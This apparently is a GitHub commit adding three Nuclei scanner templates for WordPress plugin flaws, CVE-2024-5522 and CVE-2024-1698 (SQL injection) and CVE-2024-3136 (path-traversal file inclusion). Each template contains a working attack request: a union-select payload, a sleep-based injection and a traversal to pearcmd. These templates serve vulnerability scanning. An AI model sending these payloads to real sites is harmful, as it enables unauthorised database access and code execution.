-
-
Notifications
You must be signed in to change notification settings - Fork 187
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Auto Update Nuclei [Wed Sep 18 12:36:39 UTC 2024] :robot:
- Loading branch information
1 parent
abb7579
commit 1abc21d
Showing
4 changed files
with
160 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
id: CVE-2024-5522 | ||
|
||
info: | ||
name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection | ||
author: JohnDoeAnonITA | ||
severity: critical | ||
description: | | ||
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks | ||
remediation: Fixed in 2.5.27 | ||
reference: | ||
- https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2024-5522 | ||
classification: | ||
cvss-score: 9.8 | ||
cwe-id: CWE-89 | ||
cve-id: CVE-2024-5522 | ||
epss-score: 0.04 | ||
epss-percentile: 9 | ||
cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:wordpress:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
publicwww-query: "/wp-content/plugins/html5-video-player" | ||
product: html5_video_player | ||
vendor: bplugins | ||
tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player | ||
|
||
variables: | ||
num: "999999999" | ||
|
||
http: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '{{md5(num)}}' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
# digest: 490a0046304402203fd67002382c9c1b98b641fdd6e608cf7037d3c97adf4155780ead6ea438a974022069028181b50cf8bee33382862eb443b6dc5293098bfce41ac309bf76a6624d18:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,65 @@ | ||
id: CVE-2024-3136 | ||
|
||
info: | ||
name: MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template | ||
author: iamnoooob,rootxharsh,pdresearch | ||
severity: critical | ||
description: The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | ||
impact: | | ||
An attacker can read sensitive files, execute arbitrary code, or escalate privileges. | ||
remediation: | | ||
Upgrade MasterStudy LMS to version 3.3.4 or higher to mitigate the vulnerability. | ||
reference: | ||
- https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/helpers.php | ||
- https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/templates.php | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9a573740-cdfe-4b58-b33b-5e50bcbc4779?source=cve | ||
- https://github.com/drdry2/CVE-2024-3136-Wordpress-RCE | ||
- https://github.com/nomi-sec/PoC-in-GitHub | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2024-3136 | ||
epss-score: 0.00065 | ||
epss-percentile: 0.28259 | ||
cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:wordpress:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 2 | ||
publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" | ||
product: masterstudy_lms | ||
vendor: stylemixthemes | ||
tags: cve,cve2024,wp,wordpress,unauth,lfi | ||
variables: | ||
randomstr: "{{randstr_1}}" | ||
marker: "{{base64(randomstr)}}" | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /?p=1 HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
action=stm_lms_load_content&nonce={{nonce}}& | ||
host-redirects: true | ||
max-redirects: 2 | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(to_lower(body_2),"config-create: must have 2 parameters")' | ||
- 'status_code_2 == 200' | ||
condition: and | ||
|
||
extractors: | ||
- type: regex | ||
part: body | ||
regex: | ||
- '"load_content":"(\w+?)"' | ||
group: 1 | ||
internal: true | ||
name: nonce | ||
# digest: 490a00463044022018775892dbb2446d6b501086a1a6aae7d5bb43c0bb3abadec971a46cb36bd4a5022025be6d8d149132e1b0986595eda7ab8b7f6b2a7fa17907b383af4dc2cb80192f:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
id: CVE-2024-1698 | ||
|
||
info: | ||
name: NotificationX <= 2.8.2 - SQL Injection | ||
author: DhiyaneshDk | ||
severity: critical | ||
description: | | ||
The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | ||
reference: | ||
- https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Database.php | ||
- https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Rest/Analytics.php | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve | ||
- https://github.com/fkie-cad/nvd-json-data-feeds | ||
- https://nvd.nist.gov/vuln/detail/CVE-2024-1698 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2024-1698 | ||
epss-score: 0.00045 | ||
epss-percentile: 0.12615 | ||
cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:wordpress:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
fofa-query: body="/wp-content/plugins/notificationx" | ||
product: notificationx | ||
vendor: wpdeveloper | ||
tags: cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli | ||
|
||
http: | ||
- raw: | ||
- | | ||
@timeout 10s | ||
POST /wp-json/notificationx/v1/analytics HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/json | ||
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'duration>=5' | ||
- 'status_code == 200' | ||
- 'contains(body, "{\"success\":true}")' | ||
- 'contains(header, "application/json")' | ||
condition: and | ||
# digest: 4a0a00473045022100dc0c2cee22d2614e1a3a15a7318e0f20fd4d87a1169cbc7196d2e41346a50a8c022027708781fc9ab4554ea6cb10af29ed73bf80a5394900b0d0dd7f20638496ca61:922c64590222798bb761d5b6d8e72950 |